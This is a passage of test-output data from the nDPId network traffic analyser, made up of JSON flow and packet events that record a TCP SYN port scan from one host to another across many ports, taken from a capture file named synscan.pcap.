-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqUAAC4Gz82sEAAIQA2GNIzTINDdU4MZAAAAAGACDAALvAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4AAADsGqfKsEAAIQA2GNIzT7BvdU4MZAAAAAGACEAA8cAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsynEAAC0GUQGsEAAIQA2GNIzTC7jdU4MZAAAAAGACCAAk1AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsBJsAAC8GFNisEAAIQA2GNIzTBbXdU4MZAAAAAGACEAAi1wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsRjMAADoGyD+sEAAIQA2GNIzTCNTdU4MZAAAAAGACDAAjuAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZnsAAC4Gs\/esEAAIQA2GNIzTFrPdU4MZAAAAAGACDAAV2QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsxl0AACUGXRWsEAAIQA2GNIzTAB7dU4MZAAAAAGACCAAwbgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtIAADIG16CsEAAIQA2GNIzTBAPdU4MZAAAAAGACDAAoiQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsn5YAADcGcdysEAAIQA2GNIzTH0DdU4MZAAAAAGACEAAJTAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsHnAAADgG8gKsEAAIQA2GNIzTwBjdU4MZAAAAAGACBAB0cwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsrbQAADEGab6sEAAIQA2GNIzTAFLdU4MZAAAAAGACCAAwOgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs2p4AADMGOtSsEAAIQA2GNIzTCHHdU4MZAAAAAGACEAAgGwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAshOQAACUGno6sEAAIQA2GNIzTJMfdU4MZAAAAAGACCAALxQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsIo8AADgG7eOsEAAIQA2GNIzTEB7dU4MZAAAAAGACBAAkbgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsVrUAAC0GxL2sEAAIQA2GNIzT4cXdU4MZAAAAAGACCABOxgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADkGAmWsEAAIQA2GNIzTGMrdU4MZAAAAAGACCAAXwgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAse1MAACYGpx+sEAAIQA2GNIzTCvDdU4MZAAAAAGACDAAhnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAscl4AACwGqhSsEAAIQA2GNIzTEjbdU4MZAAAAAGACBAAiVgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsjp0AADcGgtWsEAAIQA2GNIzTHj3dU4MZAAAAAGACEAAKTwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsTWIAAC8GzBCsEAAIQA2GNIzTAtbdU4MZAAAAAGACEAAltgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNuUAACUG7I2sEAAIQA2GNIzTA5DdU4MZAAAAAGACCAAs\/AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsRV0AACwG1xWsEAAIQA2GNIzTPX7dU4MZAAAAAGACBAD3DQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DsAADUGPzesEAAIQA2GNIzTZIbdU4MZAAAAAGACCADMBQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAshVsAADgGixesEAAIQA2GNIzTBw3dU4MZAAAAAGACBAAtfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs1uMAACsGRo+sEAAIQA2GNIzTIcvdU4MZAAAAAGACEAAGwQAAAgQFtA=="} 